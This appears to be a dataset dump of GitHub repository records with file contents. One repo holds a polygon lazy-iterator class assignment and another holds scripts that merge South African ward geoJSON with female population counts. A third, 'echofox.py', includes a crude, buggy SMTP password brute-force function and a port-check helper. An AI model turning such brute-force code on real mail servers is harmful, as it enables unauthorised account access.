repo_name
stringlengths 5
114
| repo_url
stringlengths 24
133
| snapshot_id
stringlengths 40
40
| revision_id
stringlengths 40
40
| directory_id
stringlengths 40
40
| branch_name
stringclasses 209
values | visit_date
timestamp[ns] | revision_date
timestamp[ns] | committer_date
timestamp[ns] | github_id
int64 9.83k
683M
⌀ | star_events_count
int64 0
22.6k
| fork_events_count
int64 0
4.15k
| gha_license_id
stringclasses 17
values | gha_created_at
timestamp[ns] | gha_updated_at
timestamp[ns] | gha_pushed_at
timestamp[ns] | gha_language
stringclasses 115
values | files
listlengths 1
13.2k
| num_files
int64 1
13.2k
|
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Ech0Fox/echofox.py | https://github.com/Ech0Fox/echofox.py | 04b66981bfc3284e36261455a1cd4a0c19a87389 | 4096a8eb47492cd04948837cbd2a30f4620d8594 | 1cd4baac3b4fc98368880ee0ce30141b6d04791f | refs/heads/master | 2020-03-23T17:50:55.449978 | 2019-01-13T23:30:26 | 2019-01-13T23:30:26 | 141,878,510 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.49360546469688416,
"alphanum_fraction": 0.49786847829818726,
"avg_line_length": 29.088354110717773,
"blob_id": "ddf839945727dce1430e80d46b6279a09ce8a409",
"content_id": "32da8499b3e6bd8697e5d37242567d13c9b44722",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 7741,
"license_type": "no_license",
"max_line_length": 115,
"num_lines": 249,
"path": "/echofox.py",
"repo_name": "Ech0Fox/echofox.py",
"src_encoding": "UTF-8",
"text": "import socket\r\nimport time\r\nimport smtplib\r\nimport ftplib\r\nimport ipaddress\r\nfrom urllib import request as rr\r\nimport uuid\r\n\r\ns = socket.socket(socket.AF_INET)\r\n# Prints the EchoFox Header/Title\r\ndef echofox_title():\r\n print(\" _________ _________ __ __ _________ _________ _________ __ __ \")\r\n print(\"| ______| | ______| | | | | | _____ | | ______| | _____ | \\ \\ / / \")\r\n print(\"| | | | | | | | | | | | | | | | | | \\ \\ / / \")\r\n print(\"| |______ | | | |_____| | | | | | | |______ | | | | \\ \\_/ / \")\r\n print(\"| ______| | | | _____ | | | | | | ______| | | | | ) _ ( \")\r\n print(\"| | | | | | | | | | | | | | | | | | / / \\ \\ \")\r\n print(\"| |______ | |______ | | | | | |_____| | | | | |_____| | / / \\ \\ \")\r\n print(\"|_________| |_________| |__| |__| |_________| |__| |_________| /__/ \\__\\ \")\r\n print(\"----------------------------------------------------------------------------------------\")\r\n\r\n\r\nclass EchoFile:\r\n def read(self, filename):\r\n if filename.split('.')[1] == 'echo':\r\n echo_file = True\r\n else:\r\n echo_file = False\r\n oFile = open(filename, encoding='utf-8')\r\n rFile = oFile.read()\r\n sFile = rFile.split('-')\r\n if echo_file is True:\r\n if sFile[0].upper() == 'ALPHA':\r\n AP_pass = sFile[1]\r\n print('File is locked with ALPHA protocol. Please enter password')\r\n user_atmp = getpass.getpass()\r\n if str(user_atmp) == AP_pass:\r\n print(sFile[2:])\r\n else:\r\n print('Incorrect password')\r\n else:\r\n print(sFile)\r\n else:\r\n print('ERROR:File type not \".echo\"')\r\n pass\r\n\r\nclass Math:\r\n # Adds 2 numbers\r\n def add(self, a, b):\r\n try:\r\n num_out = (float(a) + float(b))\r\n print(num_out)\r\n except Exception as x:\r\n print(x)\r\n\r\n\r\n # Subtracts 2 numbers\r\n def sub(self, a, b):\r\n try:\r\n num_out = (float(a) - float(b))\r\n print(num_out)\r\n except Exception as x:\r\n print(x)\r\n\r\n\r\n # Multiplies 2 numbers\r\n def multi(self, a, b):\r\n try:\r\n num_out = (float(a) * float(b))\r\n print(num_out)\r\n except Exception as x:\r\n print(x)\r\n\r\n\r\n # Divides 2 numbers\r\n def divi(self, a, b):\r\n try:\r\n num_out = (float(a) / float(b))\r\n print(num_out)\r\n except ZeroDivisionError:\r\n print(\" Imagine that you have zero cookies and you split them evenly among zero friends.\\n\"\r\n \" How many cookies does each person get?\\n\"\r\n \" See? It doesn't make sense. And Cookie Monster is sad that there are no cookies,\\n\"\r\n \" and you are sad that you have no friends.\\n^v^\")\r\n finally:\r\n print(Exception)\r\n\r\n\r\n# Returns the value of 2 added numbers\r\ndef r_add(a, b):\r\n try:\r\n num_out = (float(a) + float(b))\r\n return num_out\r\n except Exception as x:\r\n print(x)\r\n\r\n\r\n# Returns the value of 2 subtracted numbers\r\ndef r_sub(a, b):\r\n try:\r\n num_out = (float(a) - float(b))\r\n return num_out\r\n except Exception as x:\r\n print(x)\r\n\r\n\r\n# Returns the value of 2 multiplied numbers\r\ndef r_multi(a, b):\r\n try:\r\n num_out = (float(a) * float(b))\r\n return num_out\r\n except Exception as x:\r\n print(x)\r\n\r\n\r\n# Returns the value of 2 divided numbers\r\ndef r_divi(a, b):\r\n try:\r\n num_out = (float(a) - float(b))\r\n return num_out\r\n except ZeroDivisionError:\r\n print(\" Imagine that you have zero cookies and you split them evenly among zero friends.\\n\"\r\n \" How many cookies does each person get?\\n\"\r\n \" See? It doesn't make sense. And Cookie Monster is sad that there are no cookies,\\n\"\r\n \" and you are sad that you have no friends.\\n^v^\")\r\n finally:\r\n print(Exception)\r\n\r\n\r\n# Checks for internet by trying to get the IP of google.ca\r\ndef inet_check():\r\n try:\r\n socket.gethostbyname('www.google.ca')\r\n return True\r\n except Exception:\r\n return False\r\n\r\n\r\n# Gets host IP via socket\r\ndef get_ip(host):\r\n return socket.gethostbyname(host)\r\n\r\n\r\ndef get_pub_ip():\r\n x = rr.urlopen(\"http://ip.42.pl/\").read()\r\n return str(x)\r\n\r\n\r\n# Reads given files\r\ndef read(file):\r\n try:\r\n f = open(file, encoding='utf-8')\r\n print(f.read())\r\n f.close()\r\n except Exception as x:\r\n print(x)\r\n\r\n\r\n# Scans the senected port of the selected domain\r\ndef pscan_a(host, port):\r\n try:\r\n s.connect((str(host), int(port)))\r\n s.close()\r\n return True\r\n except Exception:\r\n return False\r\n\r\n\r\n# Brute Force utilitiy\r\ndef smtp_bf(filename, domain, port, user):\r\n smtpserver = smtplib.SMTP(domain, port)\r\n passwdfile = filename\r\n for password in passwdfile:\r\n try:\r\n smtpserver.login(user=user, password=password)\r\n print('Password Found', password)\r\n smtpserver.close()\r\n break\r\n except smtplib.SMTPAuthenticationError:\r\n pass\r\n finally:\r\n print(Exception)\r\n\r\n\r\n# Establishes a connection with an FTP host\r\ndef ftp_connect(target, user='', password=''):\r\n ftpserver = ftplib.FTP(host=target, user=user, passwd=password)\r\n return ftpserver\r\n\r\n\r\n# Error handler\r\ndef err_handle(error, addon='|-----|'):\r\n print('\\n' + addon + str(error) + addon, '\\n')\r\n\r\n\r\n# Prints all commands(not in order of apperence of code)\r\ndef help():\r\n print(' echofox.echofox_title()\\n Prints the EchoFox Title/Header')\r\n print(' echofox.add(a, b)\\n Adds 2 int/float numbers together and prints them')\r\n print(' echofox.sub(a, b)\\n Subtracts 2 int/float numbers and prints them')\r\n print(' echofox.multi(a, b)\\n Multiplies 2 int/float numbers and prints them')\r\n print(' echofox.divi(a, b)\\n Divides 2 int/float numbers and prints them')\r\n print(' echofox.inet_check()\\n Checks for internet connection by trying to connect to google')\r\n print(' echofox.get_ip(host)\\n Gets the IP of the host')\r\n print(' echofox.read(file)\\n Reads the file in the given directory')\r\n print(' echofox.pscan_a(host, port)\\n Checks to see if the given port on the given host is open')\r\n print(' echofox.smtp_bf(filename)\\n Gets a file and uses it as a Brute Force Base against a SMTP host')\r\n\r\n\r\nclass Errors:\r\n def access_denied(self):\r\n return \"ERROR:Access Denied\"\r\n\r\n def area_404(self):\r\n return \"ERROR:Area Not Found\"\r\n\r\n def area_ALPHA(self):\r\n return \"ERROR.CRITICAL:ALPHA Protocol Failed\"\r\n\r\n\r\ndef server_host(max_con):\r\n addr = input('Address: ')\r\n port = int(input('Port: '))\r\n server = (addr, port)\r\n try:\r\n s.bind(server)\r\n s.listen(max_con)\r\n conn, addr = s.accept()\r\n msg = str(conn.recv(9600))\r\n conn.close()\r\n s.close()\r\n return msg\r\n except OSError or socket.error as e:\r\n return str(e)\r\n\r\n\r\ndef server_client(msg):\r\n try:\r\n msg_to_send = bytes(msg, 'ascii')\r\n s.connect(server)\r\n s.send(msg_to_send)\r\n s.close()\r\n return \"Action Complete\"\r\n except OSError or socket.error as e:\r\n return str(e)\r\n\r\n\r\ndef get_mac():\r\n return str('-'.join((hex(uuid.getnode()).replace('0x', '').upper())[i: i + 2]for i in range(0, 11, 2))).upper()\r\n"
}
] | 1 |
rramjee/Session12 | https://github.com/rramjee/Session12 | 667e1179946b07647790570a135787f237b95cfe | 74c8760a6ba046ed76dd87c729369b7737d442a1 | fcae16d9aa6fc548aef3816c4d221f23e764a5ea | refs/heads/main | 2023-06-26T04:29:45.344582 | 2021-07-26T16:46:50 | 2021-07-26T16:46:50 | 389,703,410 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.5303250551223755,
"alphanum_fraction": 0.5390586853027344,
"avg_line_length": 29.323530197143555,
"blob_id": "f86e5fd997d483efaa4fda2ba55b28bb4016fe5e",
"content_id": "17a67fec9213005d1bdb11c662d86cdf7cf90e0e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2061,
"license_type": "no_license",
"max_line_length": 218,
"num_lines": 68,
"path": "/custompolygon.py",
"repo_name": "rramjee/Session12",
"src_encoding": "UTF-8",
"text": "import random\nfrom collections import namedtuple \n#from PyClassicRound import classic_round\nfrom decimal import *\nimport cmath\nimport math\nfrom session11 import Polygon\n\nclass Polygons:\n def __init__(self, m, R):\n if m < 3:\n raise ValueError('m must be greater than 3')\n self._m = m\n self._R = R\n self.length = self._m - 2\n #self._polygons = [Polygon(i, R) for i in range(3, m+1)]\n \n def __len__(self):\n return self.length\n \n def __repr__(self):\n return f'Polygons(m={self._m}, R={self._R})'\n\n def __iter__(self):\n return self.PolyIterator(self)\n \n # def __getitem__(self, s):\n # return self._polygons[s]\n \n @property\n def max_efficiency_polygon(self):\n sorted_polygons = sorted(self._polygons, \n key=lambda p: p.area/p.perimeter,\n reverse=True)\n return sorted_polygons[0]\n\n class PolyIterator:\n def __init__(self, poly_obj):\n self._poly_obj = poly_obj\n self._index = 3\n \n def __iter__(self):\n return self\n\n def __next__(self):\n if self._index > self._poly_obj._m:\n raise StopIteration\n else:\n item = Polygon(self._index, self._poly_obj._R)\n self._index += 1\n return item\n\nif __name__ == '__main__':\n \n for num in Polygons(25,6):\n print(num)\n\n p2 = Polygons(10,8)\n p = iter(p2)\n for p in p:\n print(f'number of vertices = {p.count_edges} number of edges = {p.count_edges} Edge Length = {p.side_length} interior angle = {p.interior_angle} apothem = {p.apothem} area = {p.area} perimeter = {p.perimeter}')\n print(f'number of vertices = {p.count_edges} number of edges = {p.count_edges} Edge Length = {p.side_length} interior angle = {p.interior_angle} apothem = {p.apothem} area = {p.area} perimeter = {p.perimeter}')\n \n\n\n # print(p.__repr__())\n # print(p.area)\n # print(p.area)"
},
{
"alpha_fraction": 0.5334885120391846,
"alphanum_fraction": 0.5363330841064453,
"avg_line_length": 32.6260871887207,
"blob_id": "66c34750ca1d8500480f3c728e4524e16a441724",
"content_id": "287b8d78e30366c8eecb62d32fe15c3ca4f65539",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3867,
"license_type": "no_license",
"max_line_length": 90,
"num_lines": 115,
"path": "/session11.py",
"repo_name": "rramjee/Session12",
"src_encoding": "UTF-8",
"text": "import math\n\nclass Polygon:\n def __init__(self, n, R):\n if n < 3:\n raise ValueError('Polygon must have at least 3 vertices.')\n self._n = n\n self._R = R\n self.polydict={}\n \n \n def __repr__(self):\n return f'Polygon(n={self._n}, R={self._R})'\n \n @property\n def count_vertices(self):\n if self.polydict.get(\"count_vertices\"): \n print(\"picking from calculated value\")\n return self.polydict[\"count_vertices\"]\n else: \n print(\"Calculating for the first time\")\n self.polydict[\"count_vertices\"] = self._n \n return self._n \n \n @property\n def count_edges(self):\n if self.polydict.get(\"count_edges\"): \n print(\"picking from calculated value\")\n return self.polydict[\"count_edges\"]\n else: \n print(\"Calculating for the first time\")\n self.polydict[\"count_edges\"] = self._n \n return self._n \n \n @property\n def circumradius(self):\n if self.polydict.get(\"circumradius\"): \n print(\"picking from calculated value\")\n return self.polydict[\"circumradius\"]\n else: \n print(\"Calculating for the first time\")\n self.polydict[\"circumradius\"] = self._R \n return self._R \n \n @property\n def interior_angle(self):\n if self.polydict.get(\"interior_angle\"): \n print(\"picking from calculated value\")\n return self.polydict[\"interior_angle\"]\n else: \n print(\"Calculating for the first time\")\n self.polydict[\"interior_angle\"] = (self._n - 2) * 180 / self._n \n return self.polydict[\"interior_angle\"]\n\n @property\n def side_length(self):\n if self.polydict.get(\"side_length\"): \n print(\"picking from calculated value\")\n return self.polydict[\"side_length\"]\n else: \n print(\"Calculating for the first time\")\n self.polydict[\"side_length\"] = 2 * self._R * math.sin(math.pi / self._n) \n return self.polydict[\"side_length\"]\n\n \n @property\n def apothem(self):\n if self.polydict.get(\"apothem\"): \n print(\"picking from calculated value\")\n return self.polydict[\"apothem\"]\n else: \n print(\"Calculating for the first time\")\n self.polydict[\"apothem\"] = self._R * math.cos(math.pi / self._n) \n return self.polydict[\"apothem\"]\n \n @property\n def area(self):\n if self.polydict.get(\"area\"): \n print(\"picking from calculated value\")\n return self.polydict[\"area\"]\n else: \n print(\"Calculating for the first time\")\n self.polydict[\"area\"] = self._n / 2 * self.side_length * self.apothem \n return self.polydict[\"area\"]\n \n @property\n def perimeter(self):\n if self.polydict.get(\"perimeter\"): \n print(\"picking from calculated value\")\n return self.polydict[\"perimeter\"]\n else: \n print(\"Calculating for the first time\")\n self.polydict[\"perimeter\"] = self._n * self.side_length \n return self.polydict[\"perimeter\"]\n \n def __eq__(self, other):\n if isinstance(other, self.__class__):\n return (self.count_edges == other.count_edges \n and self.circumradius == other.circumradius)\n else:\n return NotImplemented\n \n def __gt__(self, other):\n if isinstance(other, self.__class__):\n return self.count_vertices > other.count_vertices\n else:\n return NotImplemented\n\n \nif __name__ == '__main__':\n p = Polygon(25,6)\n print(p.__repr__())\n print(p.area)\n print(p.area)\n #print(p.__len__())\n"
},
{
"alpha_fraction": 0.7677304744720459,
"alphanum_fraction": 0.7890070676803589,
"avg_line_length": 57.26315689086914,
"blob_id": "c1e722b03c366851a2dd406dc16f137d9619b261",
"content_id": "2dff76069c95c8614f3808e94d9b7c8dce29a991",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 1128,
"license_type": "no_license",
"max_line_length": 241,
"num_lines": 19,
"path": "/README.md",
"repo_name": "rramjee/Session12",
"src_encoding": "UTF-8",
"text": "# Session 12 Assignment\r\n\r\nLink to DeepNote\r\n\r\nhttps://deepnote.com/project/Untitled-Python-Project-A5eG6UT0SLCJ5NPYOT34jQ/%2FLazy%20Iterator%20and%20Iterable%20Session.ipynb\r\n\r\n## Lazy Iterator and Iterables\r\n\r\nLazy Iterators are iterators that do not load entire dataset in memory but load only required information at every iteration. This is such a useful feature that has plenty of uses in real world implementations.\r\n\r\nAs part of this assignment we are building two classes. One Polygon and One Custom Polygon classes. We have built the classes as part of earlier assignments session 10 and session 11.\r\n\r\nThis assignment has 2 goals\r\n\r\n##Goal 1\r\nRefactor the Polygon class so that all the calculated properties are lazy properties, i.e. they should still be calculated properties, but they should not have to get recalculated more than once (since we made our Polygon class \"immutable\").\r\n\r\n##Goal 2\r\nRefactor the Polygons (sequence) type, into an iterable. Make sure also that the elements in the iterator are computed lazily - i.e. you can no longer use a list as an underlying storage mechanism for your polygons.\r\n\r\n"
}
] | 3 |
SwannSG/womansSheltersZApython | https://github.com/SwannSG/womansSheltersZApython | 8540ea110fb2d2727fd5755e3ade5df7d4f26a56 | 1c5ebc92cb6d6ff8dc72121d0f74985365f3a1fc | c5cfc42a7c81e080b241b1c05a12beec72502f47 | refs/heads/master | 2020-03-25T15:43:43.060862 | 2018-08-07T16:24:42 | 2018-08-07T16:24:42 | 143,898,754 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.6182838678359985,
"alphanum_fraction": 0.6271050572395325,
"avg_line_length": 26.600000381469727,
"blob_id": "d9a386478199358447bc6a596e15a986075e5b6c",
"content_id": "5b7793f11ffee788305ce71ba55fe208490829e1",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1247,
"license_type": "no_license",
"max_line_length": 99,
"num_lines": 45,
"path": "/geoJsonAddPropName.py",
"repo_name": "SwannSG/womansSheltersZApython",
"src_encoding": "UTF-8",
"text": "\"\"\"\n geoJsonAddPropName.py\n\n feature.properties = {key_1: value_1, ...}\n add new properties {key_N: value_N} for wardId=NNNNNNN\n feature.properties = {key_1: value_1, ..., key_N: value:N}\n\n ADD_PROP = {wardId: {key_1: value_1, ...}\n additional key-value pairs will be added to\n feature.properties where feature.properties.wardId = wardId \n\"\"\"\n\nimport json\nimport pickle\nimport pprint\n\nSRC_FILE = '/home/swannsg/development/womansSheleterPy/data/geoJson/WC/merge/WCmergedTest.geojson'\nPKL = '/home/swannsg/development/womansSheleterPy/data/femalePopulationFromKirsty/female18-120.pkl'\n\n\ndef add():\n fp = open(PKL, 'rb')\n ADD_PROP = pickle.load(fp) \n fp.close()\n\n fp = open(SRC_FILE, 'r')\n x = json.load(fp)\n fp.close()\n\n\n # del properties\n for feature in x['features']:\n feature_properties = feature['properties']\n ward_id = feature_properties['WardID']\n if ward_id in ADD_PROP:\n feature_properties.update(ADD_PROP[ward_id])\n feature['properties'] = feature_properties \n \n # show result\n #for each in x['features']:\n # pprint.pprint(each['properties'])\n\n fp = open(SRC_FILE, 'w')\n json.dump(x, fp)\n fp.close()\n \n"
},
{
"alpha_fraction": 0.5159059762954712,
"alphanum_fraction": 0.5518672466278076,
"avg_line_length": 15.363636016845703,
"blob_id": "1b89bcea4819bb1cdfaf72ff2ccd0be7c35b6750",
"content_id": "d4ca936d8d71feb47c853887d0c20eb1ccee67f9",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 723,
"license_type": "no_license",
"max_line_length": 95,
"num_lines": 44,
"path": "/analyseWardPop.py",
"repo_name": "SwannSG/womansSheltersZApython",
"src_encoding": "UTF-8",
"text": "\"\"\"\n analyse ward population\n\"\"\"\nimport pprint\nimport pickle\n\n\nfile = '/home/swannsg/development/womansSheleterPy/data/femalePopulationFromKirsty/wardPop.pkl'\nfp = open(file, 'rb')\nwardPops = pickle.load(fp)\nfp.close()\n\nl = []\nfor each in wardPops:\n l.append(int(wardPops[each]))\n\nl.sort()\n# pprint.pprint(l)\n\na = 0\nb = 0\nc = 0\nd = 0\ne = 0\nbin_size = 3500 # bad\nbin_size = 2000 # ok\n#bin_size = 2500\nbins = []\nfor each in l:\n if each > bin_size * 4:\n e = e + 1\n continue\n if each > bin_size * 3:\n d = d + 1\n continue\n if each > bin_size * 2:\n c = c + 1\n continue\n if each > bin_size * 1:\n b = b + 1\n continue\n a = a + 1\n\nprint (a,b,c,d,e)\n\n\n\n"
},
{
"alpha_fraction": 0.5815268754959106,
"alphanum_fraction": 0.6163996458053589,
"avg_line_length": 24.707317352294922,
"blob_id": "4c1989cb6c330e48d83893f8db6cc99613dabf98",
"content_id": "73c3dfc2eff2b7cb1a94d1fbf7a964b815c7d359",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1061,
"license_type": "no_license",
"max_line_length": 155,
"num_lines": 41,
"path": "/wardPopulation.py",
"repo_name": "SwannSG/womansSheltersZApython",
"src_encoding": "UTF-8",
"text": "\"\"\"\n Statistics South Africa\n Descriptive_Electoral_Wards\n Table 1\n Geography by Gender\n for Person weighted\n ,\"Male\",\"Female\",\"Grand Total\"\n \"21001001: Ward 1\",4242,4500,8742\n\n National data is mapped to hash map (dict) called 'result'\n key: value\n wardId: #females\n 21001001: 4500\n\n 'result' is pickled\n\"\"\"\nimport pickle\nfilename = '/home/swannsg/development/womansSheleterPy/data/femalePopulationFromKirsty/South African population data by most detailed wards and gender.csv'\n\npkl = '/home/swannsg/development/womansSheleterPy/data/femalePopulationFromKirsty/wardPop.pkl'\nresult = {}\nstart = False\nfp = open(filename, 'r')\ni = 0\nfor each in fp:\n # print (i)\n if each == ',\"Male\",\"Female\",\"Grand Total\"\\n':\n start = True\n continue\n if start:\n a,b,c,d = each.split(',')\n if a == '\"Grand Total\"':\n break\n a = a.replace('\"', '')\n result[a.split(':')[0]] = int(c)\n i = i + 1\n\nfp.close()\nfp = open(pkl, 'wb')\npickle.dump(result, fp)\nfp.close()\n\n\n \n"
},
{
"alpha_fraction": 0.6217133402824402,
"alphanum_fraction": 0.626802384853363,
"avg_line_length": 25.200000762939453,
"blob_id": "810f6bd5cd124b5fb9a0fdc4fb64ac8e8e155d5d",
"content_id": "83a33aadcd83d43eac5ec12c25ccf22e6f2909d3",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1179,
"license_type": "no_license",
"max_line_length": 79,
"num_lines": 45,
"path": "/mergeGeoJsonFiles.py",
"repo_name": "SwannSG/womansSheltersZApython",
"src_encoding": "UTF-8",
"text": "\"\"\"\n Merge ZA ward geoJson files into one output file\n\n\"\"\"\nimport pprint\nimport json\n\n# global settings\n # ---temporary working directory\nTEMP_WDIR = '/home/swannsg/development/womansSheleterPy/temp'\nDST_FILENAME = 'merge.geojson'\n# end global settings\n\nsrcFiles = [\n '/home/swannsg/development/womansSheleterPy/data/geoJson/WC/WC021.geojson',\n '/home/swannsg/development/womansSheleterPy/data/geoJson/WC/WC052.geojson'\n ]\n\n\ndef mergeGeoJsonFiles(srcFiles, dstFile=TEMP_WDIR + '/' + DST_FILENAME):\n \"\"\"\n srcFiles: list of fq filenames to merge\n dstFile: where the output file must be placed\n \"\"\"\n pprint.pprint(srcFiles)\n# pprint.pprint(dstFile)\n\n\n result = {}\n result['type'] = 'FeatureCollection'\n result['name'] = ''\n result['features'] = []\n for each in srcFiles:\n fp = open(each, 'r')\n x = json.load(fp)\n fp.close()\n result['name'] = result['name'] + ' ' + x['name']\n result['features'] = result['features'] + x['features'] \n result['name'].strip()\n\n # dict 'result' to json\n fp = open(dstFile, 'w')\n json.dump(result, fp)\n fp.close()\n # end dict 'result' to json\n"
},
{
"alpha_fraction": 0.6042830348014832,
"alphanum_fraction": 0.6061452627182007,
"avg_line_length": 25.19512176513672,
"blob_id": "90d7e476369dad577eb479b7e654cf9884f39a72",
"content_id": "20c564b02671b1bc0268d989bbb3e95350d2ed26",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1074,
"license_type": "no_license",
"max_line_length": 98,
"num_lines": 41,
"path": "/geoJsonChgPropName.py",
"repo_name": "SwannSG/womansSheltersZApython",
"src_encoding": "UTF-8",
"text": "\"\"\"\n geoJsonChgPropName.py\n\n Change the the name of the property\n\n feature.properties = {key_1: value_1, ...}\n Change key_oldName to key_newName, keeping value the same\n An existing key_newName value will be overwritten \n\n CHANGE_PROP_NAME = [(oldName, newName), ...]\n\"\"\"\nimport json\nimport pickle\nimport pprint\n\nSRC_FILE = '/home/swannsg/development/womansSheleterPy/data/geoJson/WC/merge/WCmergedTest.geojson'\n\nCHANGE_PROP_NAME = [('Province', 'Pr'), ('MunicName', 'Mn')]\n\ndef chg():\n fp = open(SRC_FILE, 'r')\n x = json.load(fp)\n fp.close()\n\n\n # change property name\n for feature in x['features']:\n for keyOld, keyNew in CHANGE_PROP_NAME:\n if keyOld in feature['properties']:\n value = feature['properties'][keyOld]\n feature['properties'].pop(keyOld, None)\n feature['properties'][keyNew] = value\n \n\n # show result\n #for each in x['features']:\n # pprint.pprint(each['properties'])\n\n fp = open(SRC_FILE, 'w')\n json.dump(x, fp)\n fp.close()\n"
},
{
"alpha_fraction": 0.7461538314819336,
"alphanum_fraction": 0.7461538314819336,
"avg_line_length": 18.923076629638672,
"blob_id": "11a049698532210fa13d2dace23ba3243c43934a",
"content_id": "cd7036112c223e9fc6255e7cb27dfe7f5a7413dc",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 260,
"license_type": "no_license",
"max_line_length": 90,
"num_lines": 13,
"path": "/view_mfp.py",
"repo_name": "SwannSG/womansSheltersZApython",
"src_encoding": "UTF-8",
"text": "\"\"\"\n View missing female populations for specific wardId\n\"\"\"\nimport pprint\nimport pickle\n\nMFP = '/home/swannsg/development/womansSheleterPy/data/femalePopulationFromKirsty/mfp.pkl'\n\nfp = open(MFP, 'rb')\nmfp = pickle.load(fp)\nfp.close()\n\npprint.pprint(mfp)\n\n"
},
{
"alpha_fraction": 0.5826255083084106,
"alphanum_fraction": 0.5843629240989685,
"avg_line_length": 34.224491119384766,
"blob_id": "a6997a7312e307ea298da71c59ec59fac5fe1604",
"content_id": "f156525a0a003dd7a4ed037178d6b13ce32799ea",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5180,
"license_type": "no_license",
"max_line_length": 111,
"num_lines": 147,
"path": "/kmlToJson.py",
"repo_name": "SwannSG/womansSheltersZApython",
"src_encoding": "UTF-8",
"text": "\"\"\"\n kml to geojson\n shapefiles WC\n handles all files\n does not handle WC.kml format ????\n\n Read population statistics at the same time\n feature.properties.woman = #woman\n see wardPopulation.py\n\n Still needed/ to be checked:\n can we minimise the file further eg. drop 3rd coord\n\n Questions\n do we merge all these files into one provincial file,\n or national file ?\n missing female populations for certain wardIds - why ?\n\n\"\"\"\nimport kml2geojson as kml\nimport json\nfrom bs4 import BeautifulSoup as bs\nimport pickle\nimport os\nimport ntpath\n\n# global settings\n # ---temporary working directory\ntemp_wdir = '/home/swannsg/development/womansSheleterPy/temp'\n # ---used to merge population data feature.properties.females\nPKL = '/home/swannsg/development/womansSheleterPy/data/femalePopulationFromKirsty/wardPop.pkl'\n #---wardIds missing female population (MFP) \nMFP = '/home/swannsg/development/womansSheleterPy/data/femalePopulationFromKirsty/mfp.pkl'\n# end global settings\n\n# load female population\nfp = open(PKL, 'rb')\nfemales = pickle.load(fp)\nfp.close()\n# end load female population\n\n# load wardIds with missing female population\nif os.path.isfile(MFP):\n # mssing female population pickle file exists\n fp = open(MFP, 'rb')\n mfp = pickle.load(fp)\n fp.close()\nelse:\n mfp = []\n# end load wardIds with missing female population\n\ndef parse_update(descHTML, ref): \n soup = bs(descHTML, 'html.parser')\n for each in soup.findAll('tr'):\n key, value = each.text.split(':')\n ref[key] = value\n\n\ndef runKmlToJson(srcFile, dstDir):\n # the arguments are a bit confusing\n #---- srcFile: input file to process\n #---- dstDir:final destination dir, \"dst_dir\"\n\n # convert to GeoJSON\n kml.main.convert(srcFile, temp_wdir)\n # kml seems to automatically generate a filename\n # ----<srcFile filename without extension>.geojson\n # infer destination filename\n infer_filename = ntpath.basename(srcFile).split('.')[0] + '.geojson'\n print (infer_filename)\n # read geojson file\n fp = open(temp_wdir + '/' + infer_filename)\n x = json.load(fp)\n fp.close()\n # delete interim geojson file\n os.remove(temp_wdir + '/' + infer_filename)\n \n\n # clean & minimise geojson file\n result = {}\n result['type'] = x['type']\n result['features'] = []\n result['name'] = x['name']\n\n i = 0\n for each in x['features']:\n # print (i)\n # initialise feature\n feature = {}\n feature['type'] = each['type'] \n feature['geometry'] = {}\n feature['properties'] = {}\n # end initialise feature\n\n # add feature props and values\n feature['properties']['name'] = each['properties']['name']\n parse_update(each['properties']['description'], feature['properties'])\n if each['geometry']['type'] == 'GeometryCollection':\n feature['geometry']['type'] = each['geometry']['type']\n feature['geometry']['geometries'] = each['geometry']['geometries'] \n else:\n feature['geometry']['coordinates'] = each['geometry']['coordinates'] # clean 3rd point !!!!!!\n feature['geometry']['type'] = each['geometry']['type']\n # end add feature props and values\n\n # remove feature.properties.<key> that are not required \n DEL_KEYS = ['CAT_B', 'MapCode', 'OBJECTID', 'Shape_Area', 'Shape_Leng', 'WardNo', 'name', 'shpFID']\n for item in DEL_KEYS:\n del feature['properties'][item]\n # end remove feature.properties.<key> that are not required \n \n # add external feature.properties.females\n # we probably need a generic property add approach !!!!\n if feature['properties']['WardID'] in females:\n feature['properties']['females'] = females[feature['properties']['WardID']]\n else:\n # don't add duplicates\n try:\n if mfp.index(feature['properties']['WardID']) > -1:\n # wardId exists, do nothing\n pass\n except:\n # new wardId so add it to \"mfp\"\n mfp.append(feature['properties']['WardID'])\n\n # WARNING !!!! arbitrarily sets feature.properties.females to zero\n feature['properties']['females'] = 0\n # end add external feature.properties.females\n\n # only add geometry.type = 'Polygon'\n if feature['geometry']['type'] == 'Polygon' or \\\n feature['geometry']['type'] == 'GeometryCollection':\n result['features'].append(feature)\n i = i + 1 \n\n # dict 'result' to json\n fp = open(dstDir + '/' + result['name'] + '.geojson', 'w')\n json.dump(result, fp)\n fp.close()\n # end dict 'result' to json\n\n\n # pickle missing_female_population\n fp = open(MFP, 'wb')\n pickle.dump(mfp, fp)\n fp.close()\n # end pickle missing_female_population\n\n\n"
},
{
"alpha_fraction": 0.760869562625885,
"alphanum_fraction": 0.760869562625885,
"avg_line_length": 14.333333015441895,
"blob_id": "fdc731b44b5e0cb68cfae5bcf400ffdf16d1094d",
"content_id": "ce2283b7a9ee208c95506f0bed3a258a30e0160a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 46,
"license_type": "no_license",
"max_line_length": 30,
"num_lines": 3,
"path": "/readme.md",
"repo_name": "SwannSG/womansSheltersZApython",
"src_encoding": "UTF-8",
"text": "## Python manipulation of data\n\nTo be updated\n"
},
{
